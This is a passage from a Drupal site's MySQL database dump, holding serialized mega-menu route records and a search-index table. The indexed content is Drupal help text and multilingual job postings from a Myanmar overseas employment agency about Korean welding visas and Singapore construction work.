3b613a323a7b693a303b733a343a2274657874223b693a313b733a33353a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f7374796c65223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33353a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f7374796c65223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('we_megamenu.geticons', '/we-mega-menu/ajax/icons', '/we-mega-menu/ajax/icons', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32343a222f77652d6d6567612d6d656e752f616a61782f69636f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36363a225c44727570616c5c77655f6d6567616d656e755c436f6e74726f6c6c65725c57654d6567614d656e7541646d696e436f6e74726f6c6c65723a3a67657449636f6e73223b733a363a225f7469746c65223b733a393a224765742049636f6e73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f77655c2d6d6567615c2d6d656e752f616a61782f69636f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32343a222f77652d6d6567612d6d656e752f616a61782f69636f6e73223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32343a222f77652d6d6567612d6d656e752f616a61782f69636f6e73223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('we_megamenu.renderblock', '/we-mega-menu/ajax/block', '/we-mega-menu/ajax/block', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32343a222f77652d6d6567612d6d656e752f616a61782f626c6f636b223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36393a225c44727570616c5c77655f6d6567616d656e755c436f6e74726f6c6c65725c57654d6567614d656e7541646d696e436f6e74726f6c6c65723a3a72656e646572426c6f636b223b733a363a225f7469746c65223b733a31323a2252656e64657220426c6f636b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f77655c2d6d6567615c2d6d656e752f616a61782f626c6f636b247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32343a222f77652d6d6567612d6d656e752f616a61782f626c6f636b223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32343a222f77652d6d6567612d6d656e752f616a61782f626c6f636b223b733a383a226e756d5061727473223b693a333b7d7d, 3);

-- --------------------------------------------------------

--
-- Table structure for table `search_dataset`
--

CREATE TABLE `search_dataset` (
  `sid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Search item ID, e.g. node ID for nodes.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The "languages".langcode of the item variant.',
  `type` varchar(64) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'Type of item, e.g. node.',
  `data` longtext NOT NULL COMMENT 'List of space-separated words from the item.',
  `reindex` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Set to force node reindexing.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores items that will be searched.';

--
-- Dumping data for table `search_dataset`
--

INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(1, 'en', 'help_search', ' configuring a previouslyplaced block goal configure the settings of a block that was previously placed in a region of a theme steps in the manage administrative menu navigate to structure   block layout  click the name of the theme that contains the block optionally click demonstrate block regions to see the regions of the theme if you only want to change the region where a block is located or the ordering of blocks within a region drag blocks to their desired positions and click save blocks  if you want to change additional settings find the region where the block you want to update is currently located and click configure in the line of the block description edit the block s settings the available settings vary depending on the module that provides the block but for all blocks you can change  block title  the heading for the block on your site for some blocks you will need to check the override title checkbox in order to enter a title display title  check the box if you want the title displayed visibility  add conditions for when the block should be displayed region  change the theme region the block is displayed in click save block   ', 1787923659),
(1, 'en', 'node_search', ' about us about us admin tue 6202023 1102 welcome to our website new comet trading agency  thank you for visiting our website new comet trading agency we are delighted to have you here please feel free to explore our website and learn more about the services and opportunities we offer if you have any questions or need assistance don t hesitate to reach out to us we are here to help you on your journey towards achieving your goals     ', 0),
(1, 'ja', 'help_search', ' configuring a previouslyplaced block goal configure the settings of a block that was previously placed in a region of a theme steps in the manage administrative menu navigate to structure   block layout  click the name of the theme that contains the block optionally click demonstrate block regions to see the regions of the theme if you only want to change the region where a block is located or the ordering of blocks within a region drag blocks to their desired positions and click save blocks  if you want to change additional settings find the region where the block you want to update is currently located and click configure in the line of the block description edit the block s settings the available settings vary depending on the module that provides the block but for all blocks you can change  block title  the heading for the block on your site for some blocks you will need to check the override title checkbox in order to enter a title display title  check the box if you want the title displayed visibility  add conditions for when the block should be displayed region  change the theme region the block is displayed in click save block   ', 1787923659),
(1, 'ja', 'node_search', '  弊社ウ 社ウェ ウェブ ェブサ ブサイ サイト   弊社ウ 社ウェ ウェブ ェブサ ブサイ サイト cometadmin mon 7032023 1738  弊社ウ 社ウェ ウェブ ェブサ ブサイ サイト new comet trading agency へよう ようこ うこそ   当社の 社のウ のウェ ウェブ ェブサ ブサイ サイト new comet trading agency へよう ようこ うこそ ご訪問 訪問い 問いた いただ ただき 大変嬉 変嬉し 嬉しく しく思 く思っ 思って ってい ていま います 当ウェ ウェブ ェブサ ブサイ サイト イトを トをお をお楽 お楽し 楽しみ しみい みいた いただ ただき 提供し 供して してい ている いるサ るサー サービ ービス ビスや スや機 や機会 機会に 会につ につい ついて いてさ てさら さらに らに詳 に詳し 詳しく しくご くご覧 ご覧く 覧くだ くださ ださい 何か質 か質問 質問や 問やお やお手 お手伝 手伝い 伝いが いがご がござ ござい ざいま いまし ました したら お気軽 気軽に 軽にお にお問 お問い 問い合 い合わ 合わせ わせく せくだ くださ ださい 私たち たちは ちは皆 は皆様 皆様の 様の目 の目標 目標達 標達成 達成の 成の旅 の旅を 旅をサ をサポ サポー ポート ートす トする するた るため ために めにこ にここ ここに こにい にいま います  ', 0),
(1, 'ko', 'help_search', ' configuring a previouslyplaced block goal configure the settings of a block that was previously placed in a region of a theme steps in the manage administrative menu navigate to structure   block layout  click the name of the theme that contains the block optionally click demonstrate block regions to see the regions of the theme if you only want to change the region where a block is located or the ordering of blocks within a region drag blocks to their desired positions and click save blocks  if you want to change additional settings find the region where the block you want to update is currently located and click configure in the line of the block description edit the block s settings the available settings vary depending on the module that provides the block but for all blocks you can change  block title  the heading for the block on your site for some blocks you will need to check the override title checkbox in order to enter a title display title  check the box if you want the title displayed visibility  add conditions for when the block should be displayed region  change the theme region the block is displayed in click save block   ', 1787923659),
(1, 'ko', 'node_search', ' about us about us cometadmin mon 7032023 1741  new comet trading agency 웹사이 사이트 이트에 오신 것을 환영합 영합니 합니다   new comet trading agency 웹사이 사이트 방문에 감사드 사드립 드립니 립니다 저희가 여러분 러분을 여기에 맞이할 수 있어 기쁩니 쁩니다 자유롭 유롭게 웹사이 사이트 이트를 탐색하 색하시 하시고 제공하 공하는 서비스 비스와 기회에 대해 더 자세히 알아보 아보세 보세요 질문이 문이나 도움이 필요하 요하신 경우 언제든 제든지 저희에 희에게 연락해 락해주 해주십 주십시 십시오 여러분 러분의 목표 달성을 위한 여정에 정에서 도움을 드리기 위해 준비되 비되어 있습니 습니다 저희 해외 취업 대행사 행사는 현재 한국 일본 말레이 레이시 이시아 등에서 다양한 채용 정보를 소개하 개하고 있습니 습니다  ', 0),
(2, 'en', 'help_search', ' managing blocks what are blocks  blocks are boxes of content rendered into an area or region of a web page of your site blocks are placed and configured specifically for each theme what are content blocks  content blocks are blocks whose content you can edit you can define one or more block types  and attach fields to each block type content blocks can be placed just like blocks provided by other modules what is the block description  the block description is an identification name for a block which is shown in the administrative interface it is not displayed on the site what is the block title  the block title is the heading that is optionally shown to site visitors when the block is placed in a region overview for managing blocks the block module allows you to place blocks in regions of your installed themes and configure block settings the block content module allows you to manage block types and content blocks see the related topics listed below for specific tasks additional resources blocks drupal user guide  ', 1787923659),
(2, 'ja', 'help_search', ' managing blocks what are blocks  blocks are boxes of content rendered into an area or region of a web page of your site blocks are placed and configured specifically for each theme what are content blocks  content blocks are blocks whose content you can edit you can define one or more block types  and attach fields to each block type content blocks can be placed just like blocks provided by other modules what is the block description  the block description is an identification name for a block which is shown in the administrative interface it is not displayed on the site what is the block title  the block title is the heading that is optionally shown to site visitors when the block is placed in a region overview for managing blocks the block module allows you to place blocks in regions of your installed themes and configure block settings the block content module allows you to manage block types and content blocks see the related topics listed below for specific tasks additional resources blocks drupal user guide  ', 1787923659),
(2, 'ko', 'help_search', ' managing blocks what are blocks  blocks are boxes of content rendered into an area or region of a web page of your site blocks are placed and configured specifically for each theme what are content blocks  content blocks are blocks whose content you can edit you can define one or more block types  and attach fields to each block type content blocks can be placed just like blocks provided by other modules what is the block description  the block description is an identification name for a block which is shown in the administrative interface it is not displayed on the site what is the block title  the block title is the heading that is optionally shown to site visitors when the block is placed in a region overview for managing blocks the block module allows you to place blocks in regions of your installed themes and configure block settings the block content module allows you to manage block types and content blocks see the related topics listed below for specific tasks additional resources blocks drupal user guide  ', 1787923659),
(3, 'en', 'help_search', ' placing a block goal place a block into a theme s region steps in the manage administrative menu navigate to structure  block layout click the name of the theme that you want to place the block in optionally click demonstrate block regions to see the regions of the theme find the region where you want the block and click place block in that region a modal dialog will pop up find the block you want to place and click place block  a configure block modal dialog will pop up configure the block and click save block  see configuring a previouslyplaced block for configuration details  ', 1787923659),
(3, 'en', 'node_search', ' who should attend e 73 welding class  who should attend e 73 welding class admin tue 6202023 1145 tue 6202023 1146 who should attend e 73 welding class  first thing want to tell is financial problem you should invest around 150200 lakhs at least 6 months to one year after arriving to korea myanmar kyats 200 lakhs would be no problem cause you can receive bank loan if you have a id card in korea second thing is you must be the one who is willing to learn the welding technology language is important although you don t have to take the exam it will be better to know vocabularies related to jobs culture and tradition of korea it will not be strange for those who went to korea with e9 visa  for the last thing as e 73 is  welding technician even though you have to change workplaces you must be in welding field in the past you only had one month to find jobs after quitting the current job for workers with e 74 visa there were some e 74 visa holders who came back to their home country because they couldn t get job within the given time so you need to pay attention and know the rules for overseas workers regulated by south korea if you don t understand in korean language it is important to know in burmese  ', 0),
(3, 'ja', 'help_search', ' placing a block goal place a block into a theme s region steps in the manage administrative menu navigate to structure  block layout click the name of the theme that you want to place the block in optionally click demonstrate block regions to see the regions of the theme find the region where you want the block and click place block in that region a modal dialog will pop up find the block you want to place and click place block  a configure block modal dialog will pop up configure the block and click save block  see configuring a previouslyplaced block for configuration details  ', 1787923659),
(3, 'ja', 'node_search', ' e 73 溶接ク 接クラ クラス ラスに スには には誰 は誰が 誰が参 が参加 参加す 加すべ すべき べきで きです ですか  e 73 溶接ク 接クラ クラス ラスに スには には誰 は誰が 誰が参 が参加 参加す 加すべ すべき べきで きです ですか cometadmin mon 7032023 1925 tue 6202023 1146 e 73 溶接ク 接クラ クラス ラスに スには には誰 は誰が 誰が参 が参加 参加す 加すべ すべき べきで きです ですか   最初に 初にお にお伝 お伝え 伝えし えした したい たいの いのは 財政的 政的な 的な問 な問題 問題で 題です 韓国に 国に到 に到着 到着後 約 150200 ラクス 1 ラクス 約 1 万円 を少な 少なく なくと くとも 6 ヶ月か 月から 1 年の間 の間に 間に投 に投資 投資す 資する する必 る必要 必要が 要があ があり ありま ります 韓国に 国に在 に在住 在住す 住する する間 ミャン ャンマ ンマー マー ー チ チャ チャッ ャット 200 ラクス クスを スを手 を手に 手に入 に入れ 入れる れるこ ること ことは とは問 は問題 問題あ 題あり ありま りませ ません なぜな ぜなら 韓国で id カード ードを ドを持 を持っ 持って ってい ていれ いれば れば銀 ば銀行 銀行ロ 行ロー ローン ーンを ンを受 を受け 受ける けるこ ること ことが とがで ができ できる きるか るから からで らです 次に 溶接技 接技術 技術を 術を学 を学び 学びた びたい たいと いとい という いう意 う意欲 意欲が 欲が必 が必要 必要で 要です 言語は 語は重 は重要 重要で 要です ですが 試験を 験を受 を受け 受ける ける必 る必要 必要は 要はあ はあり ありま りませ ません ただし 職業や 業や韓 や韓国 韓国の 国の文 の文化 文化 化 伝 伝統 伝統に 統に関 に関連 関連す 連する する語 る語彙 語彙を 彙を知 を知っ 知って ってい ている いると ると良 と良い 良いで いでし でしょ しょう e9 ビザで ザで韓 で韓国 韓国に 国に渡 に渡っ 渡った った人 々 にとっ とって っても ても不 も不思 不思議 思議で 議では ではな はない ないで いでし でしょ しょう   最後に e 73 ビザに ザにつ につい ついて いてお てお伝 お伝え 伝えし えしま します  e 73 ビザは ザは溶 は溶接 溶接技 接技術 技術者 術者の 者のた のため ための めのも のもの もので のであ であり 職場を 場を変 を変え 変える える場 る場合 場合で 合でも 引き続 き続き 続き溶 き溶接 溶接の 接の分 の分野 分野で 野で働 で働く 働く必 く必要 必要が 要があ があり ありま ります 過去に 去には e 74 ビザ保 ザ保持 保持者 持者の 者の労 の労働 労働者 働者は 現在の 在の職 の職を 職を辞 を辞め 辞めて めてか てから 1 か月以 月以内 以内に 内に新 に新し 新しい しい職 い職を 職を見 を見つ 見つけ つける ける必 る必要 必要が 要があ があり ありま りまし ました しかし その期 の期間 期間内 間内に 内に仕 に仕事 仕事を 事を見 を見つ 見つけ つけら けられ られな れなか なかっ かった e 74 ビザ保 ザ保持 保持者 持者が 母国に 国に戻 に戻る 戻るケ るケー ケース ースも スもあ もあり ありま りまし ました そのた のため 韓国が 国が規 が規定 規定す 定する する海 る海外 海外労 外労働 労働者 働者に 者に対 に対す 対する するル るルー ルール ールを ルを理 を理解 理解す 解する するこ ること ことが とが重 が重要 重要で 要です もし韓 し韓国 韓国語 国語で 語で理 で理解 理解で 解でき できな きない ない場 い場合 場合は ビルマ ルマ語 マ語で 語で理 で理解 理解す 解する するこ ること ことが とが大 が大切 大切で 切です  ', 0),
(3, 'ko', 'help_search', ' placing a block goal place a block into a theme s region steps in the manage administrative menu navigate to structure  block layout click the name of the theme that you want to place the block in optionally click demonstrate block regions to see the regions of the theme find the region where you want the block and click place block in that region a modal dialog will pop up find the block you want to place and click place block  a configure block modal dialog will pop up configure the block and click save block  see configuring a previouslyplaced block for configuration details  ', 1787923659),
(3, 'ko', 'node_search', ' who should attend e 73 welding class  who should attend e 73 welding class cometadmin mon 7032023 1925 tue 6202023 1146 who should attend e 73 welding class  first thing want to tell is financial problem you should invest around 150200 lakhs at least 6 months to one year after arriving to korea myanmar kyats 200 lakhs would be no problem cause you can receive bank loan if you have a id card in korea second thing is you must be the one who is willing to learn the welding technology language is important although you don t have to take the exam it will be better to know vocabularies related to jobs culture and tradition of korea it will not be strange for those who went to korea with e9 visa  for the last thing as e 73 is  welding technician even though you have to change workplaces you must be in welding field in the past you only had one month to find jobs after quitting the current job for workers with e 74 visa there were some e 74 visa holders who came back to their home country because they couldn t get job within the given time so you need to pay attention and know the rules for overseas workers regulated by south korea if you don t understand in korean language it is important to know in burmese  ', 0),
(4, 'en', 'help_search', ' creating a content block goal create a content block which can later be placed on the site steps in the manage administrative menu navigate to content  open the content blocks tab click add content block  if you have more than one block type defined on your site click the name of the type you want to create enter a description of your block to be shown to administrators and the body text for your block click save   ', 1787923659),
(4, 'en', 'node_search', ' wanted desperately wanted desperately admin tue 6202023 1148 thu 6222023 1148 wanted desperately korean language teacher female male 1 position who meets the following qualifications is needed in yangon those who live near sinmalike shipyard situated on bayint naung road or who can come and teach in that place must have at least topik level 3 certificate must have at least 1 year teaching experience as korean language teacher can teach at least 2 sections per day in the morning and afternoon contact us   new comet trading agency co ltd 9775556677 9950947491 95015742 18393300018393344  ', 0),
(4, 'ja', 'help_search', ' creating a content block goal create a content block which can later be placed on the site steps in the manage administrative menu navigate to content  open the content blocks tab click add content block  if you have more than one block type defined on your site click the name of the type you want to create enter a description of your block to be shown to administrators and the body text for your block click save   ', 1787923659),
(4, 'ja', 'node_search', ' wanted desperately wanted desperately cometadmin mon 7032023 1925 thu 6222023 1148 wanted desperately korean language teacher female male 1 position who meets the following qualifications is needed in yangon those who live near sinmalike shipyard situated on bayint naung road or who can come and teach in that place must have at least topik level 3 certificate must have at least 1 year teaching experience as korean language teacher can teach at least 2 sections per day in the morning and afternoon contact us   new comet trading agency co ltd 9775556677 9950947491 95015742 18393300018393344  ', 0),
(4, 'ko', 'help_search', ' creating a content block goal create a content block which can later be placed on the site steps in the manage administrative menu navigate to content  open the content blocks tab click add content block  if you have more than one block type defined on your site click the name of the type you want to create enter a description of your block to be shown to administrators and the body text for your block click save   ', 1787923659),
(4, 'ko', 'node_search', ' contact us for more information contact us for more information cometadmin mon 7032023 1925 thu 6222023 1148 contact us   new comet trading agency co ltd 9775556677 9950947491 95015742 18393300018393344  ', 0),
(5, 'en', 'help_search', ' defining a block type goal define a block type and its fields steps in the manage administrative menu navigate to structure   block types  click add block type  enter a label for this block type shown in the administrative interface optionally edit the automaticallygenerated machine name or the description click save  you will be returned to the block types page click manage fields in the row of your new block type and add the desired fields to your block type optionally click manage form display or manage display to change the editing form or field display for your block type  ', 1787923659),
(5, 'en', 'node_search', ' 5 positions for those who have passports and want to work as general workers at construction sites in singapore are needed desperately 5 positions for those who have passports and want to work as general workers at construction sites in singapore are needed desperately admin tue 6202023 1150 wed 6212023 1151 5 positions for those who have passports and want to work as general workers at construction sites in singapore are needed desperately work hours from 8 am to 5 pm 8 hours per day salary 20 singapore dollar per day if needed to work overtime after 5 pm get 15 times overtime fees have to arrange meals by yourselves no need to pay living hostel fees office company supports ferry for transportation those who aged between 20 to 35 healthy and active no need to have educational background can speak and understand english little is enough contact us new comet trading agency co ltd 95556677 9950947491095015742 9775556677018393300018393344  ', 0),
(5, 'ja', 'help_search', ' defining a block type goal define a block type and its fields steps in the manage administrative menu navigate to structure   block types  click add block type  enter a label for this block type shown in the administrative interface optionally edit the automaticallygenerated machine name or the description click save  you will be returned to the block types page click manage fields in the row of your new block type and add the desired fields to your block type optionally click manage form display or manage display to change the editing form or field display for your block type  ', 1787923659),
(5, 'ja', 'node_search', '  パスポ スポー ポート ートを トを持 を持っ 持って ってい ていて いてシ てシン シンガ ンガポ ガポー ポール ールの ルの建 の建設 建設現 設現場 現場で 場で一 で一般 一般労 般労働 労働者 働者と 者とし として して働 て働き 働きた きたい たい人 い人の 人のた のため ための 5 つのポ のポジ ポジシ ジショ ション ョンが ンが切 が切実 切実に 実に必 に必要 必要と 要とさ とされ されて れてい ていま います   パスポ スポー ポート ートを トを持 を持っ 持って ってい ていて いてシ てシン シンガ ンガポ ガポー ポール ールの ルの建 の建設 建設現 設現場 現場で 場で一 で一般 一般労 般労働 労働者 働者と 者とし として して働 て働き 働きた きたい たい人 い人の 人のた のため ための 5 つのポ のポジ ポジシ ジショ ション ョンが ンが切 が切実 切実に 実に必 に必要 必要と 要とさ とされ されて れてい ていま います admin thu 8172023 1202 wed 6212023 1151 パスポ スポー ポート ートを トを持 を持っ 持って ってい ていて いてシ てシン シンガ ンガポ ガポー ポール ールの ルの建 の建設 建設現 設現場 現場で 場で一 で一般 一般労 般労働 労働者 働者と 者とし として して働 て働き 働きた きたい たい人 い人の 人のた のため ための 5 つのポ のポジ ポジシ ジショ ション ョンが ンが切 が切実 切実に 実に必 に必要 必要と 要とさ とされ されて れてい ていま います 勤務時 務時間 午前 8 時から から午 ら午後 5 時まで 1 日 8 時間 給与 1 日あた あたり 20 シンガ ンガポ ガポー ポール ールド ルドル 5 時以降 以降に 降に残 に残業 残業が 業が必 が必要 必要な 要な場 な場合 残業手 業手当 手当は 当は通 は通常 通常の 常の給 の給与 給与の 15 倍とな となり なりま ります 食事は 事は自 は自己 自己管 己管理 管理で 理で行 で行っ 行って ってい ていた いただ ただく だく必 く必要 必要が 要があ があり ありま ります 寮の生 の生活 生活費 活費は 費は支 は支払 支払う 払う必 う必要 必要は 要はあ はあり ありま りませ ません オフィ フィス 会社は 社は交 は交通 交通手 通手段 手段と 段とし として してフ てフェ フェリ ェリー リーを ーをサ をサポ サポー ポート ートし トして してい ていま います 年齢が 20 歳から 35 歳の健 の健康 健康で 康でア でアク アクテ クティ ティブ ィブな ブな方 々 を募集 募集し 集して してい ていま います 学歴の 歴の要 の要件 要件は 件はあ はあり ありま りませ ません 英語を 語を少 を少し 少し話 し話し 理解で 解でき できる きるだ るだけ だけで けで十 で十分 十分で 分です contact us new comet trading agency co ltd 95556677 9950947491095015742 9775556677018393300018393344  ', 0),
(5, 'ko', 'help_search', ' defining a block type goal define a block type and its fields steps in the manage administrative menu navigate to structure   block types  click add block type  enter a label for this block type shown in the administrative interface optionally edit the automaticallygenerated machine name or the description click save  you will be returned to the block types page click manage fields in the row of your new block type and add the desired fields to your block type optionally click manage form display or manage display to change the editing form or field display for your block type  ', 1787923659),
(5, 'ko', 'node_search', ' 5 positions for those who have passports and want to work as general workers at construction sites in singapore are needed desperately 5 positions for those who have passports and want to work as general workers at construction sites in singapore are needed desperately cometadmin mon 7032023 1925 wed 6212023 1151 5 positions for those who have passports and want to work as general workers at construction sites in singapore are needed desperately work hours from 8 am to 5 pm 8 hours per day salary 20 singapore dollar per day if needed to work overtime after 5 pm get 15 times overtime fees have to arrange meals by yourselves no need to pay living hostel fees office company supports ferry for transportation those who aged between 20 to 35 healthy and active no need to have educational background can speak and understand english little is enough contact us new comet trading agency co ltd 95556677 9950947491095015742 9775556677018393300018393344  ', 0),
(6, 'en', 'help_search', ' managing height width and resolution breakpoints what are breakpoints  breakpoints are the point at which your site s content will respond to provide the user with the best possible layout to consume the information a breakpoint separates the height or width of viewports screens printers and other media output types into steps for instance a width breakpoint of 40em creates two steps one for widths up to 40em and one for widths above 40em breakpoints can be used to define when layouts should shift from one form to another when images should be resized and other changes that need to respond to changes in viewport height or width what are media queries  media queries are a formal way to encode breakpoints for instance a width breakpoint at 40em would be written as the media query minwidth 40em breakpoints are really just media queries with some additional metadata such as a name and multiplier information what are resolution multipliers  resolution multipliers are a measure of the viewport s device resolution defined to be the ratio between the physical pixel size of the active device and the deviceindependent pixel size the breakpoint module defines multipliers of 1 15 and 2 when defining breakpoints modules and themes can define which multipliers apply to each breakpoint what is a breakpoint group  breakpoints can be organized into groups modules and themes should use groups to separate out breakpoints that are meant to be used for different purposes such as breakpoints for layouts or breakpoints for image sizing managing breakpoints and breakpoint groups overview the breakpoint module allows you to define breakpoints and breakpoint groups in yaml files modules and themes can use the api provided by the breakpoint module to define breakpoints and breakpoint groups and to assign resolution multipliers to breakpoints additional resources working with breakpoints in drupal w3c standards for media queries ', 1787923659),
(6, 'en', 'node_search', ' in order to get employed to the shipyard in korea with an e73 visa the trainees are explained what is needed to quickly come and check the welding exam in order to get employed to the shipyard in korea with an e73 visa the trainees are explained what is needed to quickly come and check the welding exam admin tue 6202023 1218 sat 6032023 1113 in order to get employed to the shipyard in korea with an e73 visa the trainees are explained what is needed to quickly come and check the welding exam  ', 0),
(6, 'ja', 'help_search', ' managing height width and resolution breakpoints what are breakpoints  breakpoints are the point at which your site s content will respond to provide the user with the best possible layout to consume the information a breakpoint separates the height or width of viewports screens printers and other media output types into steps for instance a width breakpoint of 40em creates two steps one for widths up to 40em and one for widths above 40em breakpoints can be used to define when layouts should shift from one form to another when images should be resized and other changes that need to respond to changes in viewport height or width what are media queries  media queries are a formal way to encode breakpoints for instance a width breakpoint at 40em would be written as the media query minwidth 40em breakpoints are really just media queries with some additional metadata such as a name and multiplier information what are resolution multipliers  resolution multipliers are a measure of the viewport s device resolution defined to be the ratio between the physical pixel size of the active device and the deviceindependent pixel size the breakpoint module defines multipliers of 1 15 and 2 when defining breakpoints modules and themes can define which multipliers apply to each breakpoint what is a breakpoint group  breakpoints can be organized into groups modules and themes should use groups to separate out breakpoints that are meant to be used for different purposes such as breakpoints for layouts or breakpoints for image sizing managing breakpoints and breakpoint groups overview the breakpoint module allows you to define breakpoints and breakpoint groups in yaml files modules and themes can use the api provided by the breakpoint module to define breakpoints and breakpoint groups and to assign resolution multipliers to breakpoints additional resources working with breakpoints in drupal w3c standards for media queries ', 1787923659),
(6, 'ja', 'node_search', ' e73 ビザを ザを持 を持っ 持って って韓 て韓国 韓国の 国の造 の造船 造船所 船所で 所で雇 で雇用 雇用さ 用され される れるた るため ために めには 研修生 修生に 生に対 に対し 対して して迅 て迅速 迅速に 速に来 に来て 来て溶 て溶接 溶接試 接試験 試験を 験を受 を受け 受ける けるた るため ために めに必 に必要 必要な 要な内 な内容 内容が 容が説 が説明 説明さ 明され されま れます  e73 ビザを ザを持 を持っ 持って って韓 て韓国 韓国の 国の造 の造船 造船所 船所で 所で雇 で雇用 雇用さ 用され される れるた るため ために めには 研修生 修生に 生に対 に対し 対して して迅 て迅速 迅速に 速に来 に来て 来て溶 て溶接 溶接試 接試験 試験を 験を受 を受け 受ける けるた るため ために めに必 に必要 必要な 要な内 な内容 内容が 容が説 が説明 説明さ 明され されま れます cometadmin mon 7032023 1920 sat 6032023 1113 e73 ビザを ザを持 を持っ 持って って韓 て韓国 韓国の 国の造 の造船 造船所 船所で 所で雇 で雇用 雇用さ 用され される れるた るため ために めには 研修生 修生に 生に対 に対し 対して して迅 て迅速 迅速に 速に来 に来て 来て溶 て溶接 溶接試 接試験 試験を 験を受 を受け 受ける けるた るため ために めに必 に必要 必要な 要な内 な内容 内容が 容が説 が説明 説明さ 明され されま れます  ', 0),
(6, 'ko', 'help_search', ' managing height width and resolution breakpoints what are breakpoints  breakpoints are the point at which your site s content will respond to provide the user with the best possible layout to consume the information a breakpoint separates the height or width of viewports screens printers and other media output types into steps for instance a width breakpoint of 40em creates two steps one for widths up to 40em and one for widths above 40em breakpoints can be used to define when layouts should shift from one form to another when images should be resized and other changes that need to respond to changes in viewport height or width what are media queries  media queries are a formal way to encode breakpoints for instance a width breakpoint at 40em would be written as the media query minwidth 40em breakpoints are really just media queries with some additional metadata such as a name and multiplier information what are resolution multipliers  resolution multipliers are a measure of the viewport s device resolution defined to be the ratio between the physical pixel size of the active device and the deviceindependent pixel size the breakpoint module defines multipliers of 1 15 and 2 when defining breakpoints modules and themes can define which multipliers apply to each breakpoint what is a breakpoint group  breakpoints can be organized into groups modules and themes should use groups to separate out breakpoints that are meant to be used for different purposes such as breakpoints for layouts or breakpoints for image sizing managing breakpoints and breakpoint groups overview the breakpoint module allows you to define breakpoints and breakpoint groups in yaml files modules and themes can use the api provided by the breakpoint module to define breakpoints and breakpoint groups and to assign resolution multipliers to breakpoints additional resources working with breakpoints in drupal w3c standards for media queries ', 1787923659),
